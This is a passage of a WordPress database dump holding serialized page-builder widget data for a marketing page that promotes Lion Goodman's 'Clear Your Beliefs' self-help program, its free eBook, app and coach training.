beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1359, 1806, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1207:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1368, 1814, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1396:"[su_box title="Free eBook" class=''three-container'' box_color="#1a2d8c" radius="8"]\n<center>\n	<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p">\n	<strong>Download the free eBook.</strong>\n</p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid">\n	<input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n	<div class="infusion-field">\n		<label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n		<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" />\n	</div>\n<div class="infusion-field">\n	<label class="form-label" for="inf_field_Email">EMAIL *</label>\n	<input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" />\n</div>\n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="GET ACCESS NOW" />\n</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1839:"[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]\n<center>\n	<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1">\n	<strong>DOWNLOAD the FREE APP</strong>\n</p>\n<p class="tri-panel-p tri-panel-2nd-p-2">\n	Start Clearing Whatever Is In The Way Right Now!\n</p>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST">\n	<input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n	<div class="form-input-container-button">\n		<input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" />\n	</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST">\n	<input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" />\n	<input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" />\n</div> \n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1155:"[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]\n	<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;">\n	<big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big>\n</p>\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST">\n	<input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" />\n	<input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="LEARN MORE" />\n</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1358, 1805, 'panels_data', 'a:3:{s:7:"widgets";a:7:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full 